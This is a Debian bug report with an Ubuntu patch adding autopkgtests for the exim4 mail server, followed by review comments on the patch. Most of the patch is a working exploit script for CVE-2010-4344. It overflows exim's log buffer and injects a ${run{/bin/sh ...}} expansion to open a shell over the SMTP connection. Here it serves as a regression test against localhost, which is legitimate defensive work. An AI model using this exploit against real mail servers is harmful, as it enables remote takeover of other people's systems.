Package: exim4 Version: 4.80-7 Severity: wishlist Tags: patch User: yolanda.ro...@canonical.com Usertags: origin-ubuntu ubuntu-patch
Added autopkgtests *** /tmp/tmpz3RT9w/bug_body In Ubuntu, the attached patch was applied to achieve the following: Improve QA of packages * d/tests: added dep-8-tests Thanks for considering the patch. -- System Information: Debian Release: wheezy/sid APT prefers saucy-updates APT policy: (500, 'saucy-updates'), (500, 'saucy-security'), (500, 'saucy') Architecture: amd64 (x86_64) Kernel: Linux 3.8.0-14-generic (SMP w/1 CPU core) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash
=== modified file 'debian/changelog' === modified file 'debian/control' --- debian/control 2012-11-11 07:11:06 +0000 +++ debian/control 2013-05-27 14:09:21 +0000 @@ -13,6 +13,7 @@ libident-dev, libdb5.1-dev, libxmu-dev, libxt-dev, libxext-dev, libx11-dev, libxaw7-dev, libpq-dev, libmysqlclient-dev | libmysqlclient15-dev, libsqlite3-dev, libperl-dev, libgnutls-dev, libsasl2-dev +XS-Testsuite: autopkgtest Package: exim4-base Architecture: any === added directory 'debian/tests' === added file 'debian/tests/CVE-2010-4344.py' --- debian/tests/CVE-2010-4344.py 1970-01-01 00:00:00 +0000 +++ debian/tests/CVE-2010-4344.py 2013-05-27 14:08:55 +0000 
@@ -0,0 +1,141 @@
+#!/usr/bin/env python
+# Copyright 2010, Canonical, Ltd.
+# Author: Kees Cook <k...@ubuntu.com>
+import socket, sys
+
+HOST = sys.argv[1]
+PORT = 25
+
+try:
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+except socket.error, msg:
+ sys.stderr.write("[ERROR] %s\n" % msg[1])
+ sys.exit(1)
+
+try:
+ sock.settimeout(10)
+ sock.connect((HOST, PORT))
+except socket.error, msg:
+ sys.stderr.write("[ERROR] %s\n" % msg[1])
+ sys.exit(2)
+
+def want(value, cmd=None):
+ if cmd != None:
+ sys.stdout.write("%s\n" % (cmd))
+ sock.send("%s\n" % (cmd))
+ data = sock.recv(1024)
+ sys.stdout.write(data)
+ final = data.splitlines().pop()
+ if not final.startswith('%d ' % (value)):
+ sys.stdout.write("*** Got '%s', wanted '%d' ***\n" % (final, value))
+ sys.exit(5)
+ return data
+
+mail_from = '<root@localhost>'
+rcpt_to = '<postmaster@localhost>'
+helo = 'example.com'
+
+want(220)
+data = want(250, "EHLO %s" % (helo))
+ident = data.splitlines()[0].split()
+# Extract DNS details from helo response
+sending_host = '%s (%s) %s' % (ident[2], helo, ident[3])
+
+want(250, "MAIL FROM:%s" % (mail_from))
+want(250, "RCPT TO:%s" % (rcpt_to))
+want(354, "DATA")
+
+# want to fill up to LOG_BUFFER_SIZE - 3 (%c %s) == 8192 - 3 == 8189
+# and minus the logging header...
+target = 8189
+sent = len('''2010-12-10 11:48:15 1PR8wt-00063W-Sb rejected from %s H=%s: message too big: read=72108293 max=52428800
+Envelope-from: %s
+Envelope-to: %s
+''' % (mail_from, sending_host, mail_from, rcpt_to))
+send = target - sent
+count = 0
+padding = 3 # because of logging's " " prefix and "\n" suffix
+taunt = 'M4iLB0mb'
+header = 'MAILbombhdr%04d: '
+chunksize = len(header) + 120
+amount = send
+while amount > chunksize:
+ prev = amount
+ amount /= 2
+chunksize = prev
+chunksize = 100
+#print "Chunk size: %d" % (chunksize)
+
+#print "hit enter to continue"
+#sys.stdin.readline()
+
+while send > 0:
+ count += 1
+ #print "At position %d (%d to go)" % (sent, send)
+ data = header % (count)
+ perline = chunksize - padding
+ data += taunt * chunksize
+
+ # Down-regulate
+ togo = send - padding
+ if togo > perline:
+ togo = perline
+ # Fill hole for easier forward calculations
+ left = sent % 100
+ if left != 0:
+ left = 100 - left
+ if left < len(header) + (padding * 2):
+ left += 100
+ togo = left - padding
+ data = data[0:togo]
+
+ sock.send('%s\n' % (data))
+ send -= len(data) + padding
+ sent += len(data) + padding
+ #print "(header %d) Wrote %d, consumed %d, at position %d (%d to go)" % (count, len(data), len(data) + padding, sent, send)
+
+# This header will expand past the logging buffer
+sys.stdout.write("Sending exploit header\n")
+sock.send('HeaderX: ')
+for j in range(50):
+ for i in range(3, 13):
+ sock.send("${run{/bin/sh -c 'exec /bin/sh -i <&%d >&0 2>&0'}}" % i)
+sock.send("\n");
+
+# Now trigger the "message too large" handler
+sys.stdout.write("Sending body to trigger reject\n")
+sock.send("\n");
+for i in range(700000):
+ sock.send(taunt * 10 + "\n")
+sock.send(".\n")
+
+want(552)
+sock.settimeout(1)
+trigger = "MAIL FROM:%s\n" % (mail_from)
+sys.stdout.write(trigger)
+sock.send(trigger)
+
+final = ""
+shell = False
+hit = False
+while True:
+ try:
+ data = sock.recv(1024)
+ except:
+ break
+ sys.stdout.write(data)
+ sys.stdout.flush()
+ final += data
+ if '/bin/sh' in final:
+ shell = True
+ if shell and not hit:
+ sock.send("uname -a\n")
+ sock.send("id\n")
+ hit = True
+
+sock.close()
+if shell:
+ print "\nSystem is vulnerable"
+ sys.exit(1)
+print "\nSystem appears safe"
+sys.exit(0)
=== added file 'debian/tests/control'
--- debian/tests/control 1970-01-01 00:00:00 +0000
+++ debian/tests/control 2013-05-27 14:08:55 +0000
@@ -0,0 +1,3 @@
+Tests: daemon security
+Depends: exim4
+Restrictions: needs-root
=== added file 'debian/tests/daemon'
--- debian/tests/daemon 1970-01-01 00:00:00 +0000
+++ debian/tests/daemon 2013-05-27 14:08:55 +0000
@@ -0,0 +1,13 @@
+#!/bin/bash
+#--------------
+# Testing exim4
+#--------------
+set -e
+DAEMON=exim4
+
+if pidof -x $DAEMON > /dev/null; then
+ echo "OK"
+else
+ echo "ERROR: ${DAEMON} IS NOT RUNNING"
+ exit 1
+fi
=== added file 'debian/tests/security'
--- debian/tests/security 1970-01-01 00:00:00 +0000
+++ debian/tests/security 2013-05-27 14:08:55 +0000
@@ -0,0 +1,6 @@
+#!/bin/bash
+#----------------------
+# Testing exim security
+#----------------------
+set -e
+python `dirname $0`/CVE-2010-4344.py localhost 2>&1
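Review bot: In debian/tests/CVE-2010-4344.py the connect error handler formats the failure with `msg[1]`, but `sock.settimeout(10)` is set just before `sock.connect(...)`, and a timeout exception normally carries a single argument. The handler would then likely raise IndexError instead of printing the error and exiting 2; `sys.stderr.write("[ERROR] %s\n" % msg)` avoids the index, and the same applies to the socket-creation handler above it. The final read loop uses a bare `except:`, which treats any failure, not only the 1-second timeout, as end of data and then prints "System appears safe"; `except socket.error:` keeps unrelated errors visible. Exit status 1 is shared by the socket-creation failure and the "System is vulnerable" verdict, so the harness cannot tell a setup problem from a real finding; a distinct code for the verdict would make failed runs easier to triage.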
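Review bot: `Depends: exim4` in debian/tests/control does not pull in an interpreter, yet the `security` test added by this patch runs `python .../CVE-2010-4344.py`, and that script uses Python 2-only syntax (`except socket.error, msg`, `print "..."`). On a minimal testbed the test would fail because of a missing or wrong interpreter rather than anything about exim, so the stanza should read `Depends: exim4, python`. Since `needs-root` is set and the test pushes a very large message through the live local daemon, it may also be worth restricting it to disposable testbeds (for example with `isolation-container`, if the autopkgtest version in use supports it).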
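Review bot: The last line of debian/tests/security builds the script path with an unquoted backtick substitution, so a test directory containing whitespace would split into several arguments; `python "$(dirname "$0")/CVE-2010-4344.py" localhost 2>&1` is safer. Because `2>&1` folds the script's `[ERROR]` diagnostics into stdout, the result rests only on the exit status. A comment above the call would document that, e.g. `# non-zero exit fails the test: 1 = vulnerable or socket setup failure, 2 = connect failure, 5 = unexpected SMTP reply`.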